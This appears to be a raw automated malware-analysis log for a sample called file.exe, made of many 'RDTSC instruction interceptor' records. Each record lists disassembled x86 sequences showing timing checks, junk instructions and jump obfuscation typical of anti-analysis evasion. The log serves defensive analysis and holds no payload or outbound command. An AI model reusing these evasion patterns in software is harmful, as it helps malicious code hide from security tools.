Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EA306 second address: 7EA324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FF0EC6B64C6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FF0EC6B64CCh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 792D98 second address: 792DA5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0EC517C78h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 792DA5 second address: 792DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF0EC6B64C6h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 792DB6 second address: 792DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF0EC517C7Bh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E910F second address: 7E9115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E9115 second address: 7E911B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E911B second address: 7E912A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F13BC second address: 7F13DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF0EC517C86h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F13DA second address: 7F13DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B3474 second address: 7B3482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C7Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B3482 second address: 792248 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FF0EC6B64C8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 cmc 0x00000024 lea eax, dword ptr [ebp+12497200h] 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FF0EC6B64C8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 call 00007FF0EC6B64D2h 0x00000049 stc 0x0000004a pop edi 0x0000004b jng 00007FF0EC6B64CCh 0x00000051 or edi, dword ptr [ebp+122D3BD2h] 0x00000057 push eax 0x00000058 jmp 00007FF0EC6B64CFh 0x0000005d mov dword ptr [esp], eax 0x00000060 add ch, 0000007Ah 0x00000063 call dword ptr [ebp+122D2A7Ch] 0x00000069 pushad 0x0000006a jo 00007FF0EC6B64E1h 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B3596 second address: 7B359C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B39D2 second address: 7B39D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B3A90 second address: 7B3A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B3A95 second address: 7B3ABC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF0EC6B64C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 005C1E45h 0x00000011 sub dword ptr [ebp+122D249Bh], ecx 0x00000017 call 00007FF0EC6B64C9h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B3ABC second address: 7B3AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF0EC517C76h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B3AC7 second address: 7B3AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC6B64D7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B3AE2 second address: 7B3B12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007FF0EC517C76h 0x00000013 popad 0x00000014 jmp 00007FF0EC517C7Dh 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007FF0EC517C78h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B3B12 second address: 7B3B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B3B18 second address: 7B3B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnp 00007FF0EC517C87h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007FF0EC517C76h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B3B47 second address: 7B3B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B477A second address: 792D98 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FF0EC517C78h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D25F3h], edx 0x0000002e lea eax, dword ptr [ebp+12497200h] 0x00000034 sub di, DA84h 0x00000039 push eax 0x0000003a jmp 00007FF0EC517C80h 0x0000003f mov dword ptr [esp], eax 0x00000042 mov di, si 0x00000045 call dword ptr [ebp+122D1D2Bh] 0x0000004b push eax 0x0000004c push edx 0x0000004d ja 00007FF0EC517C78h 0x00000053 push edi 0x00000054 push eax 0x00000055 pop eax 0x00000056 jnc 00007FF0EC517C76h 0x0000005c pop edi 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F183A second address: 7F1840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F1C39 second address: 7F1C3F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F1C3F second address: 7F1C49 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF0EC6B64CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F1DB0 second address: 7F1DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F1DB6 second address: 7F1DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F49DF second address: 7F49F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 jng 00007FF0EC517C76h 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F46E1 second address: 7F46E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7604AF second address: 7604B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7604B3 second address: 7604CB instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0EC6B64C6h 0x00000008 jbe 00007FF0EC6B64C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jng 00007FF0EC6B64C8h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F8B98 second address: 7F8BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF0EC517C76h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F8BA3 second address: 7F8BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F8BAB second address: 7F8BB1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FCFF8 second address: 7FD00C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC6B64CAh 0x00000009 jnp 00007FF0EC6B64C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD00C second address: 7FD026 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF0EC517C76h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FF0EC517C78h 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD026 second address: 7FD042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64D4h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD042 second address: 7FD048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD048 second address: 7FD053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD053 second address: 7FD057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E9B6 second address: 75E9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E9C1 second address: 75E9CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E9CB second address: 75E9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 800A00 second address: 800A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 800D27 second address: 800D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF0EC6B64C6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF0EC6B64D4h 0x00000013 jp 00007FF0EC6B64C6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8067FB second address: 80680A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF0EC517C76h 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80699E second address: 8069A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8069A6 second address: 8069CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FF0EC517C80h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8069CA second address: 8069D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007FF0EC6B64C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B4263 second address: 7B4269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B4269 second address: 7B42DD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0EC6B64D7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007FF0EC6B64CBh 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FF0EC6B64C8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c cmc 0x0000002d jmp 00007FF0EC6B64D4h 0x00000032 push eax 0x00000033 js 00007FF0EC6B64DDh 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FF0EC6B64CFh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 806DEB second address: 806E01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0EC517C7Dh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 806F78 second address: 806F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF0EC6B64C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80798E second address: 807994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 807994 second address: 807998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80E3A1 second address: 80E3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC517C80h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80E51B second address: 80E570 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FF0EC6B64D4h 0x00000011 jne 00007FF0EC6B64C6h 0x00000017 popad 0x00000018 jmp 00007FF0EC6B64CCh 0x0000001d jno 00007FF0EC6B64DEh 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80E570 second address: 80E574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80E835 second address: 80E83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80E83A second address: 80E889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C7Ch 0x00000008 jnp 00007FF0EC517C76h 0x0000000e jmp 00007FF0EC517C7Ch 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FF0EC517C83h 0x00000020 popad 0x00000021 jne 00007FF0EC517C82h 0x00000027 jnl 00007FF0EC517C76h 0x0000002d jng 00007FF0EC517C76h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80E889 second address: 80E893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80E893 second address: 80E899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80E899 second address: 80E8A3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF0EC6B64C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80EB1D second address: 80EB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80EDFE second address: 80EE02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80EE02 second address: 80EE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 814EC5 second address: 814ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8180FC second address: 818111 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0EC517C76h 0x00000008 jmp 00007FF0EC517C7Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81824F second address: 818271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64CFh 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FF0EC6B64C6h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 818271 second address: 818275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8183C3 second address: 8183CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF0EC6B64C6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8183CF second address: 8183DD instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8183DD second address: 8183E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8183E1 second address: 8183E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81880D second address: 81882C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 818CA0 second address: 818CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 818CA6 second address: 818CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 818CAC second address: 818CFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C85h 0x00000007 js 00007FF0EC517C76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007FF0EC517C99h 0x00000015 jmp 00007FF0EC517C89h 0x0000001a jmp 00007FF0EC517C7Ah 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 818CFB second address: 818D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 818D01 second address: 818D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 818D05 second address: 818D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81F257 second address: 81F25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81F25B second address: 81F290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c jmp 00007FF0EC6B64D1h 0x00000011 pop edi 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007FF0EC6B64CAh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81F40F second address: 81F413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81F413 second address: 81F41F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF0EC6B64C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81F6B7 second address: 81F6BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81F6BB second address: 81F6BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81F922 second address: 81F92E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FF0EC517C76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81F92E second address: 81F932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81FA6F second address: 81FA73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81FA73 second address: 81FA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
